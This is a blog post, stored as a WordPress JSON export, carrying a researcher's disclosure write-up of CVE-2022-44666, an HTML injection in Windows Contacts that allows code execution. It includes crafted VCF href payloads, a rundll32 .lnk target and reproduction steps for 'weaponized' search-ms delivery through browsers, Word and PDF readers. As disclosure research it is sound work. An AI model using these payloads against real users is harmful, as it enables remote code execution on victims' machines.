{"id":69055,"date":"2023-07-19T14:31:28","date_gmt":"2023-07-19T06:31:28","guid":{"rendered":"https:\/\/version-2.com\/?p=69055"},"modified":"2023-08-07T15:56:21","modified_gmt":"2023-08-07T07:56:21","slug":"microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2023\/07\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\/","title":{"rendered":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"69055\" class=\"elementor elementor-69055\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" 
data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" 
data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\" width=\"700\" height=\"394\" \/><\/p><div class=\"news-detail-inner-content\" data-v-85c4bf60=\"\" data-v-0bbc59dc=\"\"><p>This is the story about another forgotten 0day, fully disclosed more than 4 years ago by <a href=\"https:\/\/twitter.com\/hyp3rlinx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">John Page (aka hyp3rlinx)<\/a>. To understand the report, you have to consider I&#8217;m stupid \ud83d\ude42 And my stupidity drives me to take longer paths to solve simple issues, but it also leads me to figure out other ways to exploit some bugs. Why do I say this? Because I was unable to quickly understand that the way to create a .contact file is just browsing to the Contacts folder in order to create the contact; instead, I used this info to first create a VCF file and then wrongly thought that this was some type of variant. 
That was also because my brain can&#8217;t understand that some 0days stay forgotten for such a long time \u00af\\_(\u30c4)_\/\u00af Once that was done, and after the &#8220;wontfix&#8221; replies by <a href=\"https:\/\/twitter.com\/msftsecresponse\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">MSRC<\/a> and <a href=\"https:\/\/twitter.com\/thezdi\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">ZDI<\/a>, further investigations were made to increase the severity, finally reaching .contact files and the Windows URL protocol handler &#8220;ldap&#8221;.<\/p><h2>Details<\/h2><ul><li><p><strong>Vendor<\/strong>: Microsoft.<\/p><\/li><li><p><strong>App<\/strong>: Microsoft Windows Contacts.<\/p><\/li><li><p><strong>Version<\/strong>: 10.0.19044.1826.<\/p><\/li><li><p><strong>Tested systems<\/strong>: Windows 10 &amp; Windows 11.<\/p><\/li><li><p><strong>Tested system versions<\/strong>: Microsoft Windows [Version 10.0.19044.1826] &amp; Microsoft Windows [Version 10.0.22000.795]<\/p><\/li><\/ul><h2>Intro<\/h2><p>This started while I was reading the exploit code for <a href=\"https:\/\/www.exploit-db.com\/exploits\/46222\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">this vulnerability<\/a>, which was actually released as a 0day; <a href=\"https:\/\/www.zerodayinitiative.com\/advisories\/ZDI-19-121\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">ZDI&#8217;s report<\/a> is also available.<\/p><p><strong><em>Update 2022\/07\/21<\/em><\/strong><em>: After reporting this case to MS, MSRC&#8217;s folks rightly pointed out to me that Windows Contacts isn&#8217;t the default program to open VCF files.<\/em><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp7qvvp1l4b0uqo38mlhrxf.png\" \/><\/p><p><em>Further research still demonstrates that the default program for VCF files on Win7 ESU &amp; WinServer2019 is Windows Contacts (wab.exe); otherwise MS People (PeopleApp.exe) is used. 
Here is the full table from this testing:<\/em><\/p><ul><li><p><em>Windows 7: Default program for VCF files is Windows Contacts (wab.exe).<\/em><\/p><\/li><li><p><em>Windows Server 2019: Default program for VCF files is Windows Contacts (wab.exe).<\/em><\/p><\/li><li><p><em>Windows 10: Default program for VCF files is MS People (PeopleApp.exe).<\/em><\/p><\/li><li><p><em>Windows 10 + MS Office: Default program for VCF files is MS Outlook (outlook.exe).<\/em><\/p><\/li><li><p><em>Windows 11: Default program for VCF files is MS People (PeopleApp.exe).<\/em><\/p><\/li><\/ul><p><em>Anyway, they still argue there&#8217;s some social engineering involved, such as opening a crafted VCF file and clicking on some links to exploit the bug, so it doesn&#8217;t meet the MSRC bug bar for a security update.<\/em><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp7rkzp1l690uo35xue7ioa.png\" \/><\/p><p><strong><em>Update 2022\/07\/25<\/em><\/strong><em>: Well, after further research, it&#8217;s the same bug. I&#8217;ve finally been able to find a .contact proof of concept. It&#8217;s actually possible to correctly parse a .contact file using HTML entities. Note this solves the previous issue (<\/em><strong><em>Update 2022\/07\/21<\/em><\/strong><em>), and this file format (.contact) is opened by Windows Contacts, the default program for this file extension, even when MS Office is installed in the system. It just needs a first file association if that hasn&#8217;t been done yet, but the only program installed by default to do that is Windows Contacts.<\/em><\/p><p><strong><em>Update 2022\/07\/25<\/em><\/strong><em>: This further research made me reach a point I had been trying to reach for some time: using some URL protocol handler to automatically open crafted contact data to exploit the bug. 
I was finally able to get it working thanks to the ldap URI scheme, which is associated by default with the Windows Contacts application. Just by setting up a rogue LDAP server and serving the payload data under the mail, url or wwwhomepage attributes, the impact is increased because it&#8217;s no longer necessary to double-click a malicious VCF\/Contact file: it can be delivered using URL protocols.<\/em><\/p><p><strong><em>Update 2023\/02\/08<\/em><\/strong><em>: As a gesture of goodwill by MSRC, <\/em><a href=\"https:\/\/twitter.com\/hyp3rlinx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\"><em>John Page (aka hyp3rlinx)<\/em><\/a><em> has been included in the acknowledgement page for the <\/em><a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-44666\" target=\"_blank\" rel=\"noopener noreferrer nofollow\"><em>CVE-2022-44666<\/em><\/a><em> discovery.<\/em><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp7rypm1l6f0uo3gi0vctsq.png\" \/><\/p><h2>Description<\/h2><p>The report is basically the same as the links above; however, I&#8217;ve improved the social engineering involved a bit. In fact, the first thing I did was to improve the way the links are seen. Just as with an XSS vulnerability, this is actually an HTML injection, so it&#8217;s possible to close the first anchor element and insert a new one. 
Then, I wanted to hide those HTML elements, so setting as long an &#8220;innerHTML&#8221; as possible would be enough to hide them (because there are char limits).<\/p><p>This is the final payload used:<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"notepad\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p>To watch what happens, run procmon and set up a fake target for the href attribute like this:<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"foo.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p>Once the link is clicked, output like this is observed in procmon:<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp96crn1luk0uo3fajn9pqr.png\" \/><\/p><p>This is the stack trace for the first &#8220;CreateFile&#8221; operation:<\/p><pre><code>0\tFLTMGR.SYS\tFltpPerformPreCallbacksWorker + 0x36c\t0xfffff806675a666c\tC:\\WINDOWS\\System32\\drivers\\FLTMGR.SYS\n1\tFLTMGR.SYS\tFltpPassThroughInternal + 0xca\t0xfffff806675a611a\tC:\\WINDOWS\\System32\\drivers\\FLTMGR.SYS\n2\tFLTMGR.SYS\tFltpCreate + 0x310\t0xfffff806675dc0c0\tC:\\WINDOWS\\System32\\drivers\\FLTMGR.SYS\n3\tntoskrnl.exe\tIofCallDriver + 0x55\t0xfffff8066904e565\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n4\tntoskrnl.exe\tIoCallDriverWithTracing + 0x34\t0xfffff8066909c224\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n5\tntoskrnl.exe\tIopParseDevice + 0x117d\t0xfffff806694256bd\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n6\tntoskrnl.exe\tObpLookupObjectName + 0x3fe\t0xfffff8066941329e\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n7\tntoskrnl.exe\tObOpenObjectByNameEx + 0x1fa\t0xfffff806694355fa\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n8\tntoskrnl.exe\tNtQueryAttributesFile + 0x1c5\t0xfffff80669501125\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n9\tntoskrnl.exe\tKiSystemServiceCopyEnd + 0x25\t0xfffff806692097b5\tC:\\WINDOWS\\system32\\ntoskrnl.exe\n10\tntdll.dll\tNtQueryAttributesFile + 0x14\t0x7ff8f0aed4e4\tC:\\Windows\\System32\\ntdll.dll\n11\tKernelBase.dll\tGetFileAttributesW 
+ 0x85\t0x7ff8ee19c045\tC:\\Windows\\System32\\KernelBase.dll\n12\tshlwapi.dll\tPathFileExistsAndAttributesW + 0x5a\t0x7ff8ef20212a\tC:\\Windows\\System32\\shlwapi.dll\n13\tshlwapi.dll\tPathFileExistsDefExtAndAttributesW + 0xa1\t0x7ff8ef2022b1\tC:\\Windows\\System32\\shlwapi.dll\n14\tshlwapi.dll\tPathFileExistsDefExtW + 0x3f\t0x7ff8ef2021ef\tC:\\Windows\\System32\\shlwapi.dll\n15\tshlwapi.dll\tPathFindOnPathExW + 0x2f7\t0x7ff8ef201f77\tC:\\Windows\\System32\\shlwapi.dll\n16\tshell32.dll\tPathResolve + 0x154\t0x7ff8eebb0954\tC:\\Windows\\System32\\shell32.dll\n17\tshell32.dll\tCShellExecute::QualifyFileIfNeeded + 0x105\t0x7ff8eebb05c9\tC:\\Windows\\System32\\shell32.dll\n18\tshell32.dll\tCShellExecute::ValidateAndResolveFileIfNeeded + 0x5e\t0x7ff8eeb1e422\tC:\\Windows\\System32\\shell32.dll\n19\tshell32.dll\tCShellExecute::_DoExecute + 0x6d\t0x7ff8eeb1e1cd\tC:\\Windows\\System32\\shell32.dll\n20\tshell32.dll\t&lt;lambda_519a2c088cd7d0cdfafe5aad47e70646&gt;::&lt;lambda_invoker_cdecl&gt; + 0x2d\t0x7ff8eeb09fed\tC:\\Windows\\System32\\shell32.dll\n21\tSHCore.dll\t_WrapperThreadProc + 0xe9\t0x7ff8f098bf69\tC:\\Windows\\System32\\SHCore.dll\n22\tkernel32.dll\tBaseThreadInitThunk + 0x14\t0x7ff8f07e7034\tC:\\Windows\\System32\\kernel32.dll\n23\tntdll.dll\tRtlUserThreadStart + 0x21\t0x7ff8f0aa2651\tC:\\Windows\\System32\\ntdll.dll\n<\/code><\/pre><p>Setting a breakpoint in <strong>Shell32!ShellExecuteExW<\/strong>, we can have a clearer picture of the functions involved:<\/p><pre><code>CommandLine: \"C:\\Program Files\\Windows Mail\\wab.exe\" \/vcard C:\\Users\\admin\\Documents\\vcf-0day\\exploit.vcf\n...\nModLoad: 00007ff7`c7d50000 00007ff7`c7dd5000   wab.exe \n...\n0:000&gt; bp SHELL32!ShellExecuteExW\n...\nBreakpoint 0 hit\nSHELL32!ShellExecuteExW:\n00007ff8`eeb20e40 48895c2410      mov     qword ptr [rsp+10h],rbx ss:000000d8`dc2dae88=0000000000090622\n0:000&gt; k\n # Child-SP          RetAddr           Call Site\n00 000000d8`dc2dae78 00007ff8`d3afee27 
SHELL32!ShellExecuteExW\n01 000000d8`dc2dae80 00007ff8`d3ad7802 wab32!SafeExecute+0x143\n02 000000d8`dc2dbf90 00007ff8`ef3b2920 wab32!fnSummaryProc+0x1c2\n03 000000d8`dc2dbfc0 00007ff8`ef3b20c2 USER32!UserCallDlgProcCheckWow+0x144\n04 000000d8`dc2dc0a0 00007ff8`ef3b1fd6 USER32!DefDlgProcWorker+0xd2\n05 000000d8`dc2dc160 00007ff8`ef3ae858 USER32!DefDlgProcW+0x36\n06 000000d8`dc2dc1a0 00007ff8`ef3ade1b USER32!UserCallWinProcCheckWow+0x2f8\n07 000000d8`dc2dc330 00007ff8`ef3ad68a USER32!SendMessageWorker+0x70b\n08 000000d8`dc2dc3d0 00007ff8`d93a6579 USER32!SendMessageW+0xda\n09 000000d8`dc2dc420 00007ff8`d93a62e7 comctl32!CLink::SendNotify+0x12d\n0a 000000d8`dc2dd560 00007ff8`d9384bb8 comctl32!CLink::Notify+0x77\n0b 000000d8`dc2dd590 00007ff8`d935add2 comctl32!CMarkup::OnButtonUp+0x78\n0c 000000d8`dc2dd5e0 00007ff8`ef3ae858 comctl32!CLink::WndProc+0x86ff2\n0d 000000d8`dc2dd6f0 00007ff8`ef3ae299 USER32!UserCallWinProcCheckWow+0x2f8\n0e 000000d8`dc2dd880 00007ff8`ef3ac050 USER32!DispatchMessageWorker+0x249\n0f 000000d8`dc2dd900 00007ff8`d92b6317 USER32!IsDialogMessageW+0x280\n10 000000d8`dc2dd990 00007ff8`d92b61b3 comctl32!Prop_IsDialogMessage+0x4b\n11 000000d8`dc2dd9d0 00007ff8`d92b5e2d comctl32!_RealPropertySheet+0x2bb\n12 000000d8`dc2ddaa0 00007ff8`d3acfb68 comctl32!_PropertySheet+0x49\n13 000000d8`dc2ddad0 00007ff8`d3ace871 wab32!CreateDetailsPropertySheet+0x930\n14 000000d8`dc2de140 00007ff8`d3ad68f5 wab32!HrShowOneOffDetails+0x4f5\n15 000000d8`dc2de390 00007ff8`d3af800f wab32!HrShowOneOffDetailsOnVCard+0xed\n16 000000d8`dc2de400 00007ff7`c7d51b16 wab32!WABObjectInternal::VCardDisplay+0xbf\n17 000000d8`dc2de450 00007ff7`c7d52c28 wab!WinMain+0x896\n18 000000d8`dc2dfab0 00007ff8`f07e7034 wab!__mainCRTStartup+0x1a0\n19 000000d8`dc2dfb70 00007ff8`f0aa2651 KERNEL32!BaseThreadInitThunk+0x14\n1a 000000d8`dc2dfba0 00000000`00000000 ntdll!RtlUserThreadStart+0x21\n<\/code><\/pre><p>And the involved pseudo-code is the next:<\/p><pre><code>_int64 __fastcall fnSummaryProc(HWND 
hWnd, int a2, WPARAM a3, LONG_PTR a4)\n{\n\n...\n\n      default:\n        if ( !((v22 + 4) &amp; 0xFFFFFFFD) &amp;&amp; *(_WORD *)(v5 + 136) )\n          SafeExecute(v7, (const unsigned __int16 *)v9, (const unsigned __int16 *)(v5 + 136)); &lt;== FOLLOW THIS PATH\n        break;\n    }\n  }\n  return 1i64;\n}\n\n\n__int64 __fastcall SafeExecute(HWND a1, const unsigned __int16 *a2, const unsigned __int16 *a3)\n{\n  const unsigned __int16 *v3; \/\/ rbx\n  HWND v4; \/\/ rdi\n  unsigned int v5; \/\/ ebx\n  BOOL v6; \/\/ ebx\n  __int64 v7; \/\/ rdx\n  OLECHAR *v8; \/\/ rax\n  signed int v10; \/\/ eax\n  DWORD pcchCanonicalized; \/\/ [rsp+20h] [rbp-E0h]\n  SHELLEXECUTEINFOW pExecInfo; \/\/ [rsp+30h] [rbp-D0h]\n  OLECHAR Dst[2088]; \/\/ [rsp+A0h] [rbp-60h]\n\n  v3 = a3;\n  v4 = a1;\n  memset_0(Dst, 0, 0x1048ui64);\n  pcchCanonicalized = 2084;\n  v5 = UrlCanonicalizeW(v3, Dst, &amp;pcchCanonicalized, 0);\n  if ( (v5 &amp; 0x80000000) == 0 )\n  {\n    v6 = UrlIsW(Dst, URLIS_FILEURL);\n  pExecInfo.hProcess = 0i64;\n      pExecInfo.hwnd = 0i64;\n      pExecInfo.lpVerb = 0i64;\n      _mm_store_si128((__m128i *)&amp;pExecInfo.lpParameters, (__m128i)0i64);\n      *(_OWORD *)&amp;pExecInfo.hInstApp = 0i64;\n      *(_OWORD *)&amp;pExecInfo.lpClass = 0i64;\n      *(_OWORD *)&amp;pExecInfo.dwHotKey = 0i64;\n      if ( !ShellExecuteExW(&amp;pExecInfo) ) &lt;== CALL HERE\n      {\n        v10 = GetLastError();\n        v5 = (unsigned __int16)v10 | 0x80070000;\n        if ( v10 &lt;= 0 )\n          v5 = v10;\n      }\n  }\n  ...\n}<\/code><\/pre><p>After this, it&#8217;s clear the issue actually involves <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/controls\/syslink-overview\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">SysLink controls in comctl32.dll library<\/a> and how the href attribute is parsed by wab32.dll library.<\/p><p>It isn&#8217;t possible to use remote shared locations or webdavs to exploit this.<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a 
href=\"\\\\127.0.0.1@80\\test\\payload.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;\nURL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"\\\\vboxsvr\\test\\payload.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p>The file info is queried, but the file is never executed.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp981wd1lsa0uqo12dl6vv0.png\" \/><\/p><p>It&#8217;s possible to use relative paths such as:<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"foo\\foo.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp98ea01lvp0uo3ckivgovp.png\" \/><\/p><p>Example:<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"hidden\\payload.exe\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp98koh1lvv0uo30ds11jc7.png\" \/><\/p><p>Going further, while testing rundll32 as an attack vector, I noticed it was not possible to pass arguments to the selected payload executable. However, using a .lnk file which targets a chosen executable, it was possible to use command-line arguments. 
It&#8217;s a bit tricky, but it works.<\/p><pre><code>URL;WORK:\"&gt;&lt;\/a&gt;&lt;a href=\"hidden\\run.lnk\"&gt;CLICKMEEEEE...&lt;\/a&gt;<\/code><\/pre><p>Target of run.lnk:<\/p><pre><code>rundll32.exe hidden\\payload.bin,Foo\"\n<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp992ss1lsq0uqo31ibcw43.png\" \/><\/p><p>This looks more interesting because there&#8217;s no need to drop an executable on the target system.<\/p><h2>Impact<\/h2><p>Remote Code Execution as the currently logged-in user.<\/p><h2>Proofs of Concept<\/h2><p>A file association must exist so that Windows Contacts opens .vcf files.<\/p><p><strong><em>Update 2021\/07\/25<\/em><\/strong><em>: For Contact files (.contact) there is only one application to open them by default: Windows Contacts, even when MS Office is installed in the target system.<\/em><\/p><p>Using the files located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/<\/a>:<\/p><ol><li><p>Double-click the file <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/exploit.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">exploit.vcf<\/a> (<strong><em>Update 2021\/07\/25<\/em><\/strong>: Or double-click the file exploit.contact).<\/p><\/li><li><p>Single-click one of the &#8220;click-me&#8221; links.<\/p><\/li><li><p>It launches notepad.exe using different execution paths:<\/p><ul><li><p>3.1. Link 1: Runs a .lnk file that triggers rundll32 with a crafted library.<\/p><\/li><li><p>3.2. Link 2: Triggers the execution of an executable located in the &#8220;hidden&#8221; folder as a local path.<\/p><\/li><li><p>3.3. 
Link 3: Directly.<\/p><\/li><\/ul><\/li><\/ol><p>There are a couple of videos attached in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos<\/a>:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/simple-payload.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/simple-payload.gif<\/a>: This is an example to download a single vcf file and triggers the bug.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp99j7l1lsx0uqoee8v3ebs.gif\" \/><\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/full-payload.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/full-payload.gif<\/a>: This is a more complex example which downloads a zip file that allows to trigger all the payloads.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp99ytz1lt30uqoe35z5qh2.gif\" \/><\/p><p>This is a summary of the proof of concept files located in .\/report-pocs\/:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/exploit.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/exploit.vcf<\/a>: Proof of concept to double-click it.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/exploit.zip\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/exploit.zip<\/a>: Zipped file to be downloaded which includes all the tricks to exploit the bug (video: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/full-payload.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">full-payload.gif<\/a>)<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/hidden\/payload.lnk\" 
target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/hidden\/payload.lnk<\/a>: LNK file to run the payload with command-line arguments.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/hidden\/payload.bin\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/hidden\/payload.bin<\/a>: DLL payload. It finally runs notepad.exe.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/hidden\/payload.exe\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/hidden\/payload.exe<\/a>: Executable payload. It finally runs notepad.exe.<\/p><\/li><\/ul><p>And the files located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/src\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/src<\/a>:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/src\/dllmain.cpp\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">dllmain.cpp<\/a>: DLL library used as payload (payload.bin).<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/src\/payload.cpp\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">payload.cpp<\/a>: Executable used as payload (payload.exe).<\/p><\/li><\/ul><h2>Further exploitation<\/h2><p>For further exploitation, and since the vulnerability doesn&#8217;t allow loading files from remote shared locations, the URI protocol &#8220;search-ms&#8221; is an interesting vector. You&#8217;ll find proofs of concept which only trigger a local binary like calc or notepad, and more complex proofs of concept that I&#8217;ve named weaponized exploits, because they don&#8217;t execute local files. 
These pocs &amp; exploits are located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/<\/a>.<\/p><p>This is a summary of target applications:<\/p><ul><li><p>Browsers: MS Edge, Google Chrome, Mozilla Firefox &amp; Opera. Note uri protocol &#8220;search-ms&#8221; is <a href=\"https:\/\/www.mozilla.org\/en-US\/security\/advisories\/mfsa2022-24\/#CVE-2022-34478\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">disabled for Mozilla Firefox at the time of writing this write-up<\/a>.<\/p><\/li><li><p>MS Word.<\/p><\/li><li><p>PDF Readers (mainly Adobe Acrobat Reader DC &amp; Foxit PDF Reader).<\/p><\/li><\/ul><p>In order to reproduce:<\/p><ol><li><p>Setup a remote shared location (SMB or WebDav). Copy content of <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/to-copy-in-remote-shared-location\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/to-copy-in-remote-shared-location\/<\/a> into it.<\/p><\/li><li><p>If wanted, hide the files running <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/to-copy-in-remote-shared-location\/setup-hidden.bat\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/to-copy-in-remote-shared-location\/setup-hidden.bat<\/a>.<\/p><\/li><li><p>Modify file exploit.html\/poc.html located in .\/further-pocs\/[vector or target app]\/remote-weaponized-by-searchms\/ to point to your remote shared location.<\/p><\/li><li><p>Start a webserver in the target app path, that is: .\/further-pocs\/[vector or target app]\/[poc||remote-weaponized-by-searchms]\/.<\/p><\/li><li><p>Run poc\/exploit files depending on the case.<\/p><\/li><li><p>For further info, watch the videos located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\" target=\"_blank\" rel=\"noopener noreferrer 
nofollow\">.\/videos<\/a>:<\/p><ul><li><p>6.1. PoC for browsers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/browsers-poc.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/browsers-poc.gif<\/a><\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/raw\/main\/videos\/browsers-poc.gif\" \/><\/p><ul><li><p>6.2. Exploit for browsers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/browsers-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/browsers-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9d6lm1lxw0uo3eq9abzrt.gif\" \/><\/p><ul><li><p>6.3. PoC for MS Word: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/msword-poc.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/msword-poc.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9gi4z1lz50uo3ghj3bsz5.gif\" \/><\/p><ul><li><p>6.4. Exploit for MS Word: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/msword-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/msword-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" 